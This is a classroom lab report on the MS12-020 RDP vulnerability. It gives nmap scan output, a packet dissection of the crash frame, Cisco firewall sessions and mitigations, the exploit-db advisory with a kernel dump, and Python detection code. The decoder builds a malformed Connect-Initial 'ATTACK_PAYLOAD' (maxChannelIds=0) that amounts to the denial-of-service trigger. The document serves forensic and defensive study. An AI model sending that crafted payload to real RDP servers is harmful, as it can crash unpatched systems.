RDP DoS tests and forensic analysis of the traffic

Date: 20 May 2015   Class: CCNA Security

Scenario

This scenario was carried out with real equipment: a Cisco 2801 router acting as a zone-based firewall (ZBF), a machine running Kali Linux with the Metasploit framework, and a Windows Server 2008 host.

Port forwarding (static NAT) of TCP ports 3389 and 80 was configured so that the respective services could be reached from "the outside".

1.- Initial test

Connectivity is checked with ping and an nmap scan is run to detect the open ports on the target.

2.- Running the script to detect vulnerabilities in RDP

D:\nmap>nmap 200.0.0.1  --script=rdp-vuln-ms12-020.nse (layer-7 vulnerability test against the RDP port)

Starting Nmap 6.40 ( http://nmap.org ) at 2015-05-21 11:41 Hora est. de Sudamérica E.

Nmap scan report for 200.0.0.1

---abridged---

3389/tcp open  ms-wbt-server

| rdp-vuln-ms12-020:

|   VULNERABLE:

|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability

|     State: VULNERABLE

|     IDs:  CVE:CVE-2012-0152

|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)

|     Description:

|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.

|

|     Disclosure date: 2012-03-13

|     References:

|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020

|       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152

|

|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability

|     State: VULNERABLE

|     IDs:  CVE:CVE-2012-0002

|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)

|     Description:

|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.

|

|     Disclosure date: 2012-03-13

|     References:

|       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002

|_      http://technet.microsoft.com/en-us/security/bulletin/ms12-020

---abridged---

Nmap done: 1 IP address (1 host up) scanned in 3.66 seconds

3.- DoS attack

Metasploit is launched, the attack module is selected and the target IP is configured.

4.- Check on the RDP server

5.- Traffic involved (see the information about the exploit at the end of this document)

The traffic capture was taken after the static NAT, between the firewall and the server, which is why the destination IP we see is 192.168.1.10, the server's real address, rather than the public 200.0.0.1 that the attacker targets.

6.- Detail of frame #9, the one that actually carries out the attack

Frame 9: 276 bytes on wire (2208 bits), 276 bytes captured (2208 bits) on interface 0

Ethernet II, Src: 00:25:45:1e:73:4c (00:25:45:1e:73:4c), Dst: 00:1e:8c:1e:24:f7 (00:1e:8c:1e:24:f7)

Internet Protocol Version 4, Src: 200.0.0.10 (200.0.0.10), Dst: 192.168.1.10 (192.168.1.10)

Transmission Control Protocol, Src Port: 50033 (50033), Dst Port: 3389 (3389), Seq: 1, Ack: 1, Len: 210

TPKT, Version: 3, Length: 19

ISO 8073 COTP Connection-Oriented Transport Protocol

[Malformed Packet: T.125]

    [Expert Info (Error/Malformed): Malformed Packet (Exception occurred)]

        [Message: Malformed Packet (Exception occurred)]

        [Severity level: Error]

        [Group: Malformed]

TPKT, Version: 3, Length: 106

ISO 8073 COTP Connection-Oriented Transport Protocol

MULTIPOINT-COMMUNICATION-SERVICE T.125

[Malformed Packet: T.124]

    [Expert Info (Error/Malformed): Malformed Packet (Exception occurred)]

        [Message: Malformed Packet (Exception occurred)]

        [Severity level: Error]

        [Group: Malformed]

TPKT, Version: 3, Length: 8

ISO 8073 COTP Connection-Oriented Transport Protocol

MULTIPOINT-COMMUNICATION-SERVICE T.125

TPKT, Version: 3, Length: 8

ISO 8073 COTP Connection-Oriented Transport Protocol

MULTIPOINT-COMMUNICATION-SERVICE T.125

TPKT, Version: 3, Length: 8

ISO 8073 COTP Connection-Oriented Transport Protocol

MULTIPOINT-COMMUNICATION-SERVICE T.125

TPKT, Version: 3, Length: 8

ISO 8073 COTP Connection-Oriented Transport Protocol

MULTIPOINT-COMMUNICATION-SERVICE T.125

TPKT, Version: 3, Length: 8

ISO 8073 COTP Connection-Oriented Transport Protocol

MULTIPOINT-COMMUNICATION-SERVICE T.125

TPKT, Version: 3, Length: 8

ISO 8073 COTP Connection-Oriented Transport Protocol

MULTIPOINT-COMMUNICATION-SERVICE T.125

TPKT, Version: 3, Length: 8

ISO 8073 COTP Connection-Oriented Transport Protocol

MULTIPOINT-COMMUNICATION-SERVICE T.125

TPKT, Version: 3, Length: 8

ISO 8073 COTP Connection-Oriented Transport Protocol

MULTIPOINT-COMMUNICATION-SERVICE T.125

TPKT, Version: 3, Length: 12

ISO 8073 COTP Connection-Oriented Transport Protocol

MULTIPOINT-COMMUNICATION-SERVICE T.125

TPKT, Version: 3, Length: 9

ISO 8073 COTP Connection-Oriented Transport Protocol

MULTIPOINT-COMMUNICATION-SERVICE T.125

7.- Reaction on the firewall

Since this is a layer-7 attack carried inside a TCP session that was set up normally (frame #9 is already at Seq 1 / Ack 1), the stateful ZBF firewall registers no anomaly. Alarms could be raised by the IPS, but the installed signatures do not cover this attack.

Firewall#show policy-map type inspect zone-pair session
 Zone-pair: segura-insegura

  Service-policy inspect : policy1

    Class-map: ICMP (match-any)
      Match: protocol icmp
        0 packets, 0 bytes
        30 second rate 0 bps
      Inspect

    Class-map: saliente (match-any)
      Match: protocol ftp
        0 packets, 0 bytes
        30 second rate 0 bps
      Match: protocol http
        0 packets, 0 bytes
        30 second rate 0 bps
      Match: protocol dns
        1 packets, 42 bytes
        30 second rate 0 bps
      Inspect

    Class-map: class-default (match-any)
      Match: any
      Drop (default action)
        0 packets, 0 bytes
 Zone-pair: insegura-segura

  Service-policy inspect : policy2

    Class-map: ccp-cls-policy2-1 (match-all)
      Match: class-map match-any NetBios
        Match: protocol netbios-dgm
          0 packets, 0 bytes
          30 second rate 0 bps
        Match: protocol netbios-ssn
          0 packets, 0 bytes
          30 second rate 0 bps
      Match: access-group name NetBios
      Inspect

    Class-map: entrante (match-any)
      Match: protocol http
        0 packets, 0 bytes
        30 second rate 0 bps
      Inspect

    Class-map: ICMP (match-any)
      Match: protocol icmp
        0 packets, 0 bytes
        30 second rate 0 bps
      Inspect

    Class-map: RDP (match-any)
      Match: access-group name RDP
        4 packets, 144 bytes
        30 second rate 0 bps
      Inspect
        Half-open Sessions (the attack's session: after the RST there were several SYNs, see frames #34 to #37)
         Session 6437AF0C (200.0.0.10:40883)=>(192.168.1.10:3389) tcp SIS_OPENING
          Created 00:00:28, Last heard 00:00:21
          Bytes sent (initiator:responder) [0:0]
        Established Sessions (the monitoring session, interrupted at the moment of the attack)
         Session 6437AF0C (200.0.0.110:49397)=>(192.168.1.10:3389) tcp SIS_OPEN
          Created 00:00:07, Last heard 00:00:06
          Bytes sent (initiator:responder) [47:19]
    Class-map: class-default (match-any)
      Match: any
      Drop (default action)
        0 packets, 0 bytes
Firewall#
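What the firewall does see is in its session table: a source that leaves a half-open (SIS_OPENING) RDP session behind after tearing down the one it had just established. The following Python is an added example for this report, not Cisco tooling; its sample input is an excerpt of the `show policy-map type inspect zone-pair session` output above, and the field layout assumed by the regular expressions is taken from that output.

```python
"""Parse 'show policy-map type inspect zone-pair session' output (Cisco IOS ZBF)
and count half-open (SIS_OPENING) sessions per source.  Added example for this
lab report, not part of the original lab or of Cisco's tooling."""
import re
from collections import defaultdict

# Excerpt of the firewall output shown above (zone-pair insegura-segura, class RDP):
# attacker 200.0.0.10 half-open after its RST, monitoring client 200.0.0.110 established.
SAMPLE_OUTPUT = """\
 Zone-pair: insegura-segura
  Service-policy inspect : policy2
    Class-map: RDP (match-any)
      Match: access-group name RDP
      Inspect
        Half-open Sessions
         Session 6437AF0C (200.0.0.10:40883)=>(192.168.1.10:3389) tcp SIS_OPENING
          Created 00:00:28, Last heard 00:00:21
          Bytes sent (initiator:responder) [0:0]
        Established Sessions
         Session 6437AF0C (200.0.0.110:49397)=>(192.168.1.10:3389) tcp SIS_OPEN
          Created 00:00:07, Last heard 00:00:06
          Bytes sent (initiator:responder) [47:19]
"""

ZONE_RE = re.compile(r"^\s*Zone-pair:\s+(\S+)")
CLASS_RE = re.compile(r"^\s*Class-map:\s+(\S+)")
SESSION_RE = re.compile(
    r"^\s*Session\s+(?P<id>[0-9A-Fa-f]+)\s+"
    r"\((?P<src>[\d.]+):(?P<sport>\d+)\)=>\((?P<dst>[\d.]+):(?P<dport>\d+)\)\s+"
    r"(?P<proto>\w+)\s+(?P<state>SIS_\w+)"
)
BYTES_RE = re.compile(r"Bytes sent \(initiator:responder\) \[(\d+):(\d+)\]")


def parse_sessions(text):
    """Return one dict per 'Session' line, tagged with its zone-pair and class-map."""
    zone = klass = None
    sessions = []
    for line in text.splitlines():
        m = ZONE_RE.match(line)
        if m:
            zone = m.group(1)
            continue
        m = CLASS_RE.match(line)
        if m:
            klass = m.group(1)
            continue
        m = SESSION_RE.match(line)
        if m:
            s = m.groupdict()
            s.update(zone=zone, class_map=klass, sport=int(s["sport"]), dport=int(s["dport"]))
            sessions.append(s)
            continue
        m = BYTES_RE.search(line)          # byte counters belong to the last session seen
        if m and sessions:
            sessions[-1]["bytes_init"], sessions[-1]["bytes_resp"] = int(m.group(1)), int(m.group(2))
    return sessions


def half_open_by_source(sessions, dport=3389):
    """Count SIS_OPENING sessions toward dport, grouped by source IP.
    A source that keeps re-opening RDP after its own RST (the behaviour in
    frames #34-37 of the capture) shows up here; a normal client does not."""
    counts = defaultdict(int)
    for s in sessions:
        if s["state"] == "SIS_OPENING" and s["dport"] == dport:
            counts[s["src"]] += 1
    return dict(counts)


if __name__ == "__main__":
    sess = parse_sessions(SAMPLE_OUTPUT)
    for s in sess:
        print(f"{s['zone']}/{s['class_map']}: {s['src']}:{s['sport']} -> "
              f"{s['dst']}:{s['dport']} {s['state']} bytes={s.get('bytes_init')}:{s.get('bytes_resp')}")
    print("half-open RDP sessions by source:", half_open_by_source(sess))
```

Fed with the full output collected periodically (for example from a scheduled `show` over SSH), `half_open_by_source` gives a per-source indicator that can be alerted on even though the ZBF itself raises no alarm for this attack.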

 

8.- Changes on port 3389 to mitigate the attack

Until the patch against the RDP attacks is installed, the port should be closed as a preventive measure.
This was attempted in two ways, via the ZBF and via NAT; the two tests gave different results on the scanner side.

8.1.- ZBF method

This discards every packet that arrives at port 3389: the RDP class is switched from inspect to drop, so the matching SYNs are silently discarded and no reply is generated.

Firewall#conf t

Enter configuration commands, one per line.  End with CNTL/Z.

Firewall(config)#policy-map type inspect policy2

Firewall(config-pmap)#class type inspect RDP

Firewall(config-pmap-c)#no inspect

Firewall(config-pmap-c)#drop

Firewall(config-pmap-c)#exit

Firewall(config-pmap)#exit

Firewall(config)#

 

 

8.2.- Why does port 3389 appear as "filtered" instead of not appearing at all?

Because every port on the router that is not NATed toward the LAN answers the SYN with RST,ACK (nmap reports it as closed and, by default, does not list closed ports individually), whereas the NATed port 3389 is now matched by the drop action and produces no reply at all, so nmap considers it filtered.

This can be seen with port 21 (FTP, frames #3 and #14), which is not NATed to the server and returns RST,ACK responses, while 3389 does not get the same RST,ACK responses: the port is not non-existent, rather its packets are now discarded by the ZBF firewall policy, which is why it shows up as filtered.

8.3.- NAT method

The static NAT entry is removed from the ZBF firewall configuration.

Firewall(config)#no ip nat inside source static tcp 192.168.1.10 3389 200.0.0.1 3389 extendable

8.4.- Test after the NAT change

We verify that the router now answers with RST,ACK for port 3389, since the port is no longer in its configuration, so nmap reports it as closed and no longer lists it.

9.- Applying the patch

Once the patch was applied, inspect re-enabled in the policy and the static NAT reconfigured, the attack is no longer effective, and the scan returns the following:

D:\nmap>nmap 200.0.0.1  --script=rdp-vuln-ms12-020.nse

Starting Nmap 6.40 ( http://nmap.org ) at 2015-05-21 12:05 Hora est. de Sudamérica E.
Nmap scan report for 200.0.0.1
---abridged---
3389/tcp open  ms-wbt-server (the script prints no result: by default the NSE vulns library only reports a VULNERABLE state; run with --script-args=vulns.showall to get an explicit NOT VULNERABLE entry)
---abridged---
Nmap done: 1 IP address (1 host up) scanned in 4.06 seconds

 

10.- More info about the attack:

https://technet.microsoft.com/en-us/library/security/ms12-020.aspx

http://blogs.technet.com/b/srd/archive/2012/03/13/cve-2012-0002-a-closer-look-at-ms12-020-s-critical-issue.aspx

https://www.exploit-db.com/exploits/18606/

11.- Bug description (text reproduced from the exploit-db advisory linked above)

 

The Remote Desktop Protocol is used by the "Terminal Services / Remote

Desktop Services" and works at kernel level on port 3389.

 

There is a use-after-free vulnerability located in the handling of the
maxChannelIds field of the T.125 ConnectMCSPDU packet (offset 0x2c of
the provided proof-of-concept) when set to a value less than or equal to 5.

The problem happens during the disconnection of the user, started with
RDPWD!NM_Disconnect, while the effect of the possible code execution is
visible in termdd!IcaBufferAlloc (or termdd!IcaBufferAllocEx on
Windows 7/2008) after termdd!IcaGetPreviousSdLink returns an invalid
memory pointer. The following dump is taken from Windows 2003 Server:

  f761887c 8bff            mov     edi,edi
  f761887e 55              push    ebp
  f761887f 8bec            mov     ebp,esp
  f7618881 56              push    esi
  f7618882 57              push    edi
  f7618883 8b7d08          mov     edi,dword ptr [ebp+8]
  f7618886 8d47ec          lea     eax,[edi-14h]
  f7618889 50              push    eax
  f761888a eb09            jmp     termdd!IcaBufferAlloc+0x19 (f7618895)
  f761888c 8b4618          mov     eax,dword ptr [esi+18h]                  ; we are here
  f761888f 833800          cmp     dword ptr [eax],0                        ; or here
  f7618892 7527            jne     termdd!IcaBufferAlloc+0x3f (f76188bb)    ; must jump
  f7618894 56              push    esi
  f7618895 e878290000      call    termdd!IcaGetPreviousSdLink (f761b212)   ; the new ESI is returned by this function
  f761889a 8bf0            mov     esi,eax
  f761889c 85f6            test    esi,esi
  f761889e 75ec            jne     termdd!IcaBufferAlloc+0x10 (f761888c)
  f76188a0 ff751c          push    dword ptr [ebp+1Ch]
  f76188a3 ff7518          push    dword ptr [ebp+18h]
  f76188a6 ff7514          push    dword ptr [ebp+14h]
  f76188a9 ff7510          push    dword ptr [ebp+10h]
  f76188ac ff750c          push    dword ptr [ebp+0Ch]
  f76188af 57              push    edi
  f76188b0 e8b9fcffff      call    termdd!IcaBufferAllocInternal (f761856e)
  f76188b5 5f              pop     edi
  f76188b6 5e              pop     esi
  f76188b7 5d              pop     ebp
  f76188b8 c21800          ret     18h
  f76188bb 33c0            xor     eax,eax
  f76188bd 53              push    ebx
  f76188be 8d7e10          lea     edi,[esi+10h]
  f76188c1 40              inc     eax
  f76188c2 f00fc107        lock xadd dword ptr [edi],eax
  f76188c6 ff751c          push    dword ptr [ebp+1Ch]
  f76188c9 8b4618          mov     eax,dword ptr [esi+18h]                  ; the same value as before
  f76188cc ff7518          push    dword ptr [ebp+18h]
  f76188cf ff7514          push    dword ptr [ebp+14h]
  f76188d2 ff7510          push    dword ptr [ebp+10h]
  f76188d5 ff750c          push    dword ptr [ebp+0Ch]
  f76188d8 ff761c          push    dword ptr [esi+1Ch]
  f76188db ff10            call    dword ptr [eax]                          ; code execution
  f76188dd 8bd8            mov     ebx,eax
  f76188df 83c8ff          or      eax,0FFFFFFFFh
  f76188e2 f00fc107        lock xadd dword ptr [edi],eax
  f76188e6 7506            jne     termdd!IcaBufferAlloc+0x72 (f76188ee)
  f76188e8 56              push    esi
  f76188e9 e8382f0000      call    termdd!_IcaUnloadSd (f761b826)
  f76188ee 8bc3            mov     eax,ebx
  f76188f0 5b              pop     ebx
  f76188f1 ebc2            jmp     termdd!IcaBufferAlloc+0x39 (f76188b5)

 

  eax=040b0402 ebx=e1492090 ecx=00390080 edx=00000003 esi=040b0402 edi=e1438240

  eip=f762888c esp=b832f9d8 ebp=b832f9e0 iopl=0         nv up ei pl nz na po nc

  cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202

  termdd!IcaBufferAlloc+0x10:

  f762888c 8b4618          mov     eax,dword ptr [esi+18h] ds:0023:040b041a=????????

 

  ChildEBP RetAddr 

  b8b399e0 b89c1c34 termdd!IcaBufferAlloc+0x10

  b8b39a00 b89c1c67 RDPWD!StackBufferAlloc+0x26

  b8b39a2c b89a902c RDPWD!MCSDetachUserRequest+0x29

  b8b39a40 b89a8b44 RDPWD!NMDetachUserReq+0x14

  b8b39a4c b89a9185 RDPWD!NM_Disconnect+0x16

  b8b39a58 b89adcb4 RDPWD!SM_Disconnect+0x27

  b8b39a68 b89a906d RDPWD!SM_OnConnected+0x70

  b8b39a88 b89a8db4 RDPWD!NMAbortConnect+0x23

  b8b39ac0 b89a9d88 RDPWD!NM_Connect+0x86

  b8b39ae0 b89abcfc RDPWD!SM_Connect+0x112

  b8b39b08 b89ac786 RDPWD!WDWConnect+0x368

  b8b39b3c b89a6959 RDPWD!WDWConfConnect+0x94

  b8b39b70 f762c1c7 RDPWD!WD_Ioctl+0x1227

  b8b39b8c f762c5a3 termdd!_IcaCallSd+0x35

  b8b39bac f762ca10 termdd!_IcaCallStack+0x55

  b8b39bf4 f762abcc termdd!IcaDeviceControlStack+0x414

  b8b39c24 f762ad20 termdd!IcaDeviceControl+0x4e

  b8b39c3c 8081d5c3 termdd!IcaDispatch+0x12a

  b8b39c50 808ed4eb nt!IofCallDriver+0x45

  b8b39c64 808ee28d nt!NtWriteFile+0x2943

  b8b39d00 808e6dbc nt!NtWriteFile+0x36e5

  b8b39d34 80883968 nt!NtDeviceIoControlFile+0x2a

  b8b39d64 7c82847c nt!KeReleaseInStackQueuedSpinLockFromDpcLevel+0xb14

  b8b39d68 badb0d00 ntdll!_NLG_Notify+0x14

 

On Windows 2003 the zone of memory pointed to by ESI+18 with the
provided proof-of-concept is always in the range 040b02??-040b04??.
The exploitability depends on the possibility of controlling ESI or the
content pointed to by it (maybe via a form of heap spraying?); indeed, in
my quick tests this zone is sometimes allocated and other times it isn't.

Note that on the post-Vista Windows versions (like 7 and 2008) it "seems"
necessary to have "Allow connections from computers running any version
of Remote Desktop" enabled in order to be vulnerable.
Anyway, I'm not totally sure about this so-called limitation because it
looks like it depends on my proof-of-concept only.

 

The provided proof-of-concept uses the BER integer values set at 32bit

(big endian) in case they could be useful for easier debugging.
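Frame #9 in section 6 and the maxChannelIds description in the advisory above can be tied together with a small decoder. The following Python is an added example written for this page (it is not the original proof-of-concept and not nmap, Metasploit or Wireshark code): it splits an RDP TCP payload into TPKT records, names the X.224 and MCS PDUs, decodes the Connect-Initial far enough to read targetParameters.maxChannelIds, and flags values of 5 or less as the advisory describes. The sample payloads are constructed, not copied from the capture. The MCS choice numbers and the Connect-Initial layout are those of T.125 and MS-RDPBCGR; that the 8-, 12- and 9-byte TPKTs in frame #9 match the sizes of AttachUserRequest, ChannelJoinRequest and DisconnectProviderUltimatum on top of a 3-byte X.224 Data header is an inference of mine, not something the dissection above labels.

```python
"""Walk the TPKT records in one RDP TCP payload and flag the MS12-020 pattern.
Added example for this lab report (not the original PoC, nor nmap/Metasploit/Wireshark
code).  Sample payloads are constructed, not copied from the capture; only their
record sizes are chosen to match the 19/8/12/9-byte TPKTs of frame #9."""
import struct

# T.125 DomainMCSPDU CHOICE index (upper 6 bits of the first PER byte) -> name.
MCS_PER_CHOICE = {1: "ErectDomainRequest", 8: "DisconnectProviderUltimatum",
                  10: "AttachUserRequest", 14: "ChannelJoinRequest", 25: "SendDataRequest"}
MAXCHANNELIDS_THRESHOLD = 5   # advisory: maxChannelIds <= 5 triggers the use-after-free


def ber_read_length(buf, pos):
    """(length, next_pos) for the BER length octets at buf[pos]."""
    if buf[pos] < 0x80:
        return buf[pos], pos + 1
    n = buf[pos] & 0x7F
    return int.from_bytes(buf[pos + 1:pos + 1 + n], "big"), pos + 1 + n


def ber_read_tlv(buf, pos):
    """(tag_bytes, value_bytes, next_pos); handles the two-byte 7f 65 tag."""
    tag_end = pos + 1
    if buf[pos] & 0x1F == 0x1F:            # high-tag-number form
        while buf[tag_end] & 0x80:
            tag_end += 1
        tag_end += 1
    length, val = ber_read_length(buf, tag_end)
    return buf[pos:tag_end], buf[val:val + length], val + length


def parse_connect_initial(mcs):
    """targetParameters.maxChannelIds from an MCS Connect-Initial (MS-RDPBCGR 2.2.1.3), or None."""
    tag, body, _ = ber_read_tlv(mcs, 0)
    if tag != b"\x7f\x65":
        return None
    pos = 0
    for _ in range(3):                     # callingDomainSelector, calledDomainSelector, upwardFlag
        _, _, pos = ber_read_tlv(body, pos)
    tag, target_params, _ = ber_read_tlv(body, pos)        # targetParameters SEQUENCE
    if tag != b"\x30":
        return None
    tag, max_channel_ids, _ = ber_read_tlv(target_params, 0)   # first INTEGER of DomainParameters
    return int.from_bytes(max_channel_ids, "big", signed=True) if tag == b"\x02" else None


def walk_tpkt_stream(payload):
    """Split a TCP payload into TPKT records (RFC 1006) and describe each one."""
    records, pos = [], 0
    while pos + 4 <= len(payload):
        version, _, length = struct.unpack("!BBH", payload[pos:pos + 4])
        if version != 3 or length < 6 or pos + length > len(payload):
            records.append({"offset": pos, "tpkt_len": length, "pdu": "bad TPKT header", "flag": "malformed"})
            break
        x224 = payload[pos + 4:pos + length]
        li, pdu_type = x224[0], x224[1] & 0xF0
        rec = {"offset": pos, "tpkt_len": length, "flag": None}
        if pdu_type == 0xE0:
            rec["pdu"] = "X.224 Connection Request"
        elif pdu_type == 0xF0 and len(x224) > 1 + li:
            mcs = x224[1 + li:]            # Data TPDU: LI, DT code, EOT, then the MCS PDU
            if mcs[:2] == b"\x7f\x65":
                rec["pdu"] = "MCS Connect-Initial"
                rec["maxChannelIds"] = parse_connect_initial(mcs)
                if rec["maxChannelIds"] is not None and rec["maxChannelIds"] <= MAXCHANNELIDS_THRESHOLD:
                    rec["flag"] = "MS12-020 pattern: maxChannelIds <= 5"
            else:                          # PER-encoded DomainMCSPDU: choice index in the top 6 bits
                rec["pdu"] = "MCS " + MCS_PER_CHOICE.get(mcs[0] >> 2, f"choice {mcs[0] >> 2}")
        else:
            rec["pdu"] = f"X.224 TPDU type 0x{pdu_type:02x}"
        records.append(rec)
        pos += length
    return records


def ms12_020_indicators(payload):
    """Flag strings found in a payload; an empty list means nothing suspicious."""
    return [r["flag"] for r in walk_tpkt_stream(payload) if r["flag"]]


# --- constructed sample traffic (layout per MS-RDPBCGR; not the real PoC bytes) ---
def tpkt(data):
    return struct.pack("!BBH", 3, 0, 4 + len(data)) + data

def ber_int32(v):                          # 32-bit BER INTEGERs, as the advisory says the PoC uses
    return b"\x02\x04" + struct.pack("!I", v)

def connect_initial(max_channel_ids):
    """Connect-Initial with typical mstsc DomainParameters except maxChannelIds; userData left empty."""
    params = b"".join(ber_int32(v) for v in (max_channel_ids, 2, 0, 1, 0, 1, 0xFFFF, 2))
    seq = b"\x30" + bytes([len(params)]) + params                 # DomainParameters SEQUENCE
    body = b"\x04\x01\x01\x04\x01\x01\x01\x01\xff" + seq * 3 + b"\x04\x00"
    return b"\x7f\x65\x82" + struct.pack("!H", len(body)) + body

X224_CR = bytes.fromhex("0ee000000000000100080000000000")    # Connection Request + RDP Negotiation Request
X224_DT = b"\x02\xf0\x80"                                     # Data TPDU header (LI=2, DT, EOT)
ATTACK_PAYLOAD = (tpkt(X224_CR) + tpkt(X224_DT + connect_initial(0))
                  + tpkt(X224_DT + b"\x28") * 9                      # AttachUserRequest  -> 8-byte TPKT
                  + tpkt(X224_DT + b"\x38\x00\x01\x03\xeb")          # ChannelJoinRequest -> 12-byte TPKT
                  + tpkt(X224_DT + b"\x21\x80"))                     # DisconnectProviderUltimatum -> 9-byte TPKT
BENIGN_PAYLOAD = tpkt(X224_CR) + tpkt(X224_DT + connect_initial(34))  # mstsc-like maxChannelIds = 34
```

Wireshark marks parts of frame #9 as malformed but does not name the offending field; this decoder, run over each TCP segment toward port 3389 pulled from the capture, yields the actual maxChannelIds value to put in a report or a content-inspection rule, which is exactly the layer-7 check the stateful ZBF in section 7 cannot perform.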

 

12.- Additional details about the protocol

http://msdn.microsoft.com/en-us/library/cc240836%28v=prot.10%29.aspx

13.- Fix

http://technet.microsoft.com/en-us/security/bulletin/ms12-020

(2015) I see dead packets…

Rosario, Argentina